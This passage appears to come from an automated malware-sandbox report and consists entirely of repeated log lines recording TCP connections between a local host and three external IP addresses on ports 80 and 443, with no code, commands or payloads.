              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
